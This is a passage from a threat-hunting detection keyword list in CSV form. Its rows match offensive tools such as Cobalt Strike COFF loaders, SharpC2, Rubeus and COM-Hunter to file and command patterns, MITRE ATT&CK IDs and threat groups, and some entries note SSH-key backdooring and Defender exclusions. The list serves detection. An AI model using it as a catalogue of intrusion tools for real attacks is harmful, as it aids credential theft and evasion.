T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*CoffeeLdr* go *","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*CoffeeLdr.x64.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*CoffeeLdr.x86.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*COFFELDR_COFFELDR_H*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*coffexec *.o *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*COFFLdr.cpp*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*COFFLdr.exe*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*COFFLoader.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*COFFLoader64.exe*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*CognisysGroup/HadesLdr*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*coinomi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*coldfusion_dir_traversal_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Collection/MiniDumpWriteDump.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*com.rastamouse.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*com_exec_go(*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*combine_harvester-main*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*com-exec.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*COMHunter* -inproc*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter* -localserver*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.csproj*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.exe*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.sln*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COM-Hunter_v*.zip*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*COM-Hunter-main*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*-command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*-Command Add-MpPreference -ExclusionProcess *\Program Files\FreeFileSync\Bin\*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*command_obfuscator.py*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*command=*###---POWERSHELL---*eval $(echo *","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" +"*CommandAndControl_*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*CommandCam.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*commandovm.*.installer.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*commando-vm-master*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Commands/Brute.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Createnetonly.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/DcomCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/DroneCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/ExecuteAssembly.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/KillProcess.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/ListProcesses.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/Logonsession.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/PowerShellImport.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/Preauthscan.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/PrintWorkingDirectory.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/PsExecCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/RevToSelf.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/RunPe.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/SetSleep.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/Shell.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/ShInject.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/ShSpawn.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 